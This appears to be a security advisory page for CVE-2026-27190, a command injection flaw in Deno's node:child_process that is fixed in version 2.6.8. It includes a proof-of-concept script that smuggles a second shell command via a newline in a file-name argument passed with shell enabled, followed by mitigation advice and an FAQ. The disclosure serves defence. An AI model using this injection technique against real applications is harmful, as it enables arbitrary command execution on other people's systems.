CVE-2026-27190: Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process
Summary A command injection vulnerability exists in Deno's node:childprocess implementation.
Reproduction javascript import { spawnSync } from "node:childprocess"; import as fs from "node:fs";
// Cleanup try { fs.unlinkSync('/tmp/rceproof'); } catch {}
// Create legitimate script fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection const maliciousInput = /tmp/legitimate.ts\ntouch /tmp/rceproof;
// Vulnerable pattern spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], { shell: true, encoding: 'utf-8' });
// Verify console.log('Exploit worked:', fs.existsSync('/tmp/rceproof'));
Run: deno run --allow-all poc.mjs
The file /tmp/rceproof is created, confirming arbitrary command execution.
Mitigation
All users need to update to the patched version (Deno v2.6.8).
Other sources
Deno is a JavaScript, TypeScript, and WebAssembly runtime. Prior to 2.6.8, a command injection vulnerability exists in Deno's node:childprocess implementation. This vulnerability is fixed in 2.6.8.
— NVD
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2026-27190?
CVE-2026-27190 is classified as a high-severity command injection vulnerability.
How do I fix CVE-2026-27190?
To mitigate CVE-2026-27190, you should upgrade to Deno version 2.6.8 or higher.
Which versions of Deno are affected by CVE-2026-27190?
CVE-2026-27190 affects all versions of Deno prior to 2.6.8.
What type of vulnerability is CVE-2026-27190?
CVE-2026-27190 is a command injection vulnerability found in Deno's node:child_process implementation.
Can CVE-2026-27190 be exploited remotely?
Yes, CVE-2026-27190 can be exploited remotely, making it critical to apply the fix promptly.